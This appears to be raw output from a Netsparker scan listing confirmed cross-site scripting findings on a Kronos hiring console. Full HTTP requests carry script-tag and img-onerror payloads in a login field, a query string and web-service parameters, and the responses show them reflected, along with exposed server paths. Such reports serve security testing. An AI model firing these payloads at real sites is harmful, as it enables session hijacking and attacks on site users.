User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Cookie: JSESSIONID=2630c0ae5647d144e225
Content-Length: 70
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

j_password=3&j_username=%22%3e%3cscript%3enetsparker(9)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:49:21 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:49:21 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:49:21 GMT
Connection: close
Content-Type: text/html; charset=UTF-8





















































































































































































































































































































































































































































<html><head><title>Login</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css"><script src="../javascript/display.js" type="text/javascript"></script></head><body onLoad="document.form1.j_password.focus();" link="#666666" vlink="#666666" alink="#666666"> <form name="form1" action="/hmc/report/index.cfm?" method="post"><p>&nbsp;</p>

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="340"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="86" align="center"> <a href="http://www.deploy.com"><img src="/images/logo.jpg" border="0"></a> </td> </tr> <tr> <td height="46" class="formCopy" align="center"> <br/> Welcome to<strong> Kronos Hiring Management Console</strong>.<br/> <br/> Please enter your username and password. <br> <br/> New user? <a href="?register=1">Click here</a> to register. <br/> </td> </tr> <tr> <td height="155" align="center"> <script> function checkEnter() { if (window.event.keyCode == 13) /* they hit enter */ document.form1.submit(); } </script> <table border="0" cellpadding="3" cellspacing="0" width="300" height="100"> <tbody> <tr> <td class="fieldLabel">Username:</td> <td><input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value=""><script>netsparker(9)</script>" onKeyPress="checkEnter();"></td> </tr> <tr> <td width="100" class="fieldLabel">Password:</td> <td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td> </tr> <tr> <td colspan="2" height="20" align="center"> <span class="error"> Invalid username or password. </span><br/> <br/>

<table id="loginBtn" class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="center">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" tabindex="3" href="javascript:document.form1.submit();"

title="Login&nbsp;>" >


&nbsp;&nbsp;Login&nbsp;>&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</td> </tr> </tbody> </form> </table> </td> </tr> </table> </td> </tr></table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



<p>&nbsp;</p></body></html>
- /hmc/setup/responsefollowupnew.cfm

/hmc/setup/responsefollowupnew.cfm CONFIRMED

https://hourly.deploy.com/hmc/setup/responsefollowupnew.cfm?'"--></style></script><script>alert(0x00..

Parameters

Parameter Type Value
response_id GET
Query Based QUERYSTRING '"--></style></script><script>alert(0x000AE7)</script>

Request

GET /hmc/setup/responsefollowupnew.cfm?'"--></style></script><script>netsparker(0x000AE7)</script> HTTP/1.1
Referer: https://hourly.deploy.com/hmc/javascript/response.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:50:37 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:50:38 GMT;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:50:38 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:50:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8







































































































































































































































































































































































































































<html><head><title>Login</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css"><script src="../javascript/display.js" type="text/javascript"></script></head><body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666"> <form name="form1" action="/hmc/setup/responsefollowupnew.cfm?'"--></style></script><script>netsparker(0x000ae7)</script>" method="post"><p>&nbsp;</p>

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="340"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="86" align="center"> <a href="http://www.deploy.com"><img src="/images/logo.jpg" border="0"></a> </td> </tr> <tr> <td height="46" class="formCopy" align="center"> <br/> Welcome to<strong> Kronos Hiring Management Console</strong>.<br/> <br/> Please enter your username and password. <br> <br/> New user? <a href="?'"--></style></script><script>netsparker(0x000AE7)</script>&register=1">Click here</a> to register. <br/> </td> </tr> <tr> <td height="155" align="center"> <script> function checkEnter() { if (window.event.keyCode == 13) /* they hit enter */ document.form1.submit(); } </script> <table border="0" cellpadding="3" cellspacing="0" width="300" height="100"> <tbody> <tr> <td class="fieldLabel">Username:</td> <td><input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="" onKeyPress="checkEnter();"></td> </tr> <tr> <td width="100" class="fieldLabel">Password:</td> <td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td> </tr> <tr> <td colspan="2" height="20" align="center">

<table id="loginBtn" class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="center">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" tabindex="3" href="javascript:document.form1.submit();"

title="Login&nbsp;>" >


&nbsp;&nbsp;Login&nbsp;>&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</td> </tr> </tbody> </form> </table> </td> </tr> </table> </td> </tr></table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



<p>&nbsp;</p></body></html>
- /webservices/responseService.cfc

/webservices/responseService.cfc CONFIRMED

https://hourly.deploy.com/webservices/responseService.cfc?method=%3E%3CiMg%20src=N%20onerror=alert(9..

Parameters

Parameter Type Value
method GET ><iMg src=N onerror=alert(9)>
response_id GET 3

Request

GET /webservices/responseService.cfc?method=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&response_id=3 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/javascript/response.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:50:43 GMT
Server: Apache/2.0.46 (Red Hat)
server-error: true
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:50:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The method '><iMg src=N onerror=netsparker(9)>' could not be found in component /var/www/html/applications/webservices/responseService.cfc.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Check to ensure that the method is defined, and that it is spelled correctly.
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debugging Settings, and select the Robust Exception Information option.</li>

<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://hourly.deploy.com/hmc/javascript/response.js</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">23-Jul-11 12:50 PM</td>
</tr>
</table>
</td>
</tr>
</table>


</font>
</td>
</tr>
</table>
</body></html>


- /webservices/questionService.cfc

/webservices/questionService.cfc CONFIRMED

https://hourly.deploy.com/webservices/questionService.cfc?method=%3E%3CiMg%20src=N%20onerror=alert(9..

Parameters

Parameter Type Value
method GET ><iMg src=N onerror=alert(9)>
trait_id GET 3

Request

GET /webservices/questionService.cfc?method=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&trait_id=3 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/javascript/script_trait.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:50:55 GMT
Server: Apache/2.0.46 (Red Hat)
server-error: true
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:50:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The method '><iMg src=N onerror=netsparker(9)>' could not be found in component /var/www/html/applications/webservices/questionService.cfc.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Check to ensure that the method is defined, and that it is spelled correctly.
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debugging Settings, and select the Robust Exception Information option.</li>

<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://hourly.deploy.com/hmc/javascript/script_trait.js</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">23-Jul-11 12:50 PM</td>
</tr>
</table>
</td>
</tr>
</table>


</font>
</td>
</tr>
</table>
</body></html>


- /webservices/questionService.cfc

/webservices/questionService.cfc CONFIRMED

https://hourly.deploy.com/webservices/questionService.cfc?method=%3E%3CiMg%20src=N%20onerror=alert(9..

Parameters

Parameter Type Value
method GET ><iMg src=N onerror=alert(9)>
questionText GET 3

Request

GET /webservices/questionService.cfc?method=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&questionText=3 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/javascript/question.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:51:19 GMT
Server: Apache/2.0.46 (Red Hat)
server-error: true
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:51:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The method '><iMg src=N onerror=netsparker(9)>' could not be found in component /var/www/html/applications/webservices/questionService.cfc.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Check to ensure that the method is defined, and that it is spelled correctly.
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debugging Settings, and select the Robust Exception Information option.</li>

<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://hourly.deploy.com/hmc/javascript/question.js</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">23-Jul-11 12:51 PM</td>
</tr>
</table>
</td>
</tr>
</table>


</font>
</td>
</tr>
</table>
</body></html>


- /webservices/questionService.cfc

/webservices/questionService.cfc CONFIRMED

https://hourly.deploy.com/webservices/questionService.cfc?method=%3E%3CiMg%20src=N%20onerror=alert(9..

Parameters

Parameter Type Value
method GET ><iMg src=N onerror=alert(9)>
entity GET 3

Request

GET /webservices/questionService.cfc?method=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&entity=3 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/javascript/question.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:51:24 GMT
Server: Apache/2.0.46 (Red Hat)
server-error: true
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:51:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The method '><iMg src=N onerror=netsparker(9)>' could not be found in component /var/www/html/applications/webservices/questionService.cfc.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Check to ensure that the method is defined, and that it is spelled correctly.
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debugging Settings, and select the Robust Exception Information option.</li>

<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://hourly.deploy.com/hmc/javascript/question.js</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">23-Jul-11 12:51 PM</td>
</tr>
</table>
</td>
</tr>
</table>


</font>
</td>
</tr>
</table>
</body></html>


- /webservices/questionService.cfc

/webservices/questionService.cfc CONFIRMED

https://hourly.deploy.com/webservices/questionService.cfc?method=%3E%3CiMg%20src=N%20onerror=alert(9..

Parameters

Parameter Type Value
method GET ><iMg src=N onerror=alert(9)>
client_id GET 3

Request

GET /webservices/questionService.cfc?method=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&client_id=3 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/javascript/adr_overview.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:52:56 GMT
Server: Apache/2.0.46 (Red Hat)
server-error: true
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:52:56 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
